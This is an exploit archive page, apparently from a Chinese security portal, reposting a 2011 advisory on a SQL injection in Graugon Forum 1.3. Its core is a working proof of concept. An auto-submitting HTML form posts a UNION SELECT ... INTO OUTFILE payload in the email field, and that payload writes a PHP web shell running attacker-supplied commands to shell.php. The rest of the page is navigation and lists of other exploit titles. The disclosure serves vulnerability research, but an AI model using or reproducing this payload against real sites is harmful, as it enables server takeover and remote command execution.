首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Graugon Forum 1.3 SQL Injection Vulnerability
来源:http://www.autosectools.com/ 作者:John 发布时间:2011-04-07  

<!------------------------------------------------------------------------
# Software................Graugon Forum 1.3
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.graugon.com/
# Discovery Date..........4/3/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A SQL injection vulnerability in Graugon Forum 1.3 can be exploited to
# extract arbitrary data. In some environments it may be possible to
# create a PHP shell.
#
#
# --PoC-->

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/forum/admin.php">
            <input type="hidden" name="email" value="'and 1=0 UNION SELECT '<?php system($_GET["CMD"]); ?>','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" />
            <input type="hidden" name="password" value="" />  
        </form>
    </body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MPlayer (r33064 Lite) Buffer O
·Zend Server Java Bridge Arbitr
·Wamp Webserver 2.1 File Downlo
·IBM Lotus Domino iCalendar MAI
·Synergy 1.4 Protocol Cleartext
·Xilisoft Video Converter Ultim
·Joomla! com_virtuemart <= v1.1
·eXPert PDF Convert to Word v7
·Microsoft Windows xp AFD.sys L
·GNU glibc < 2.12.2 'fnmatch()'
·Libmodplug ReadS3M Stack Overf
·Encore ENPS-2012 Cross-site Sc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved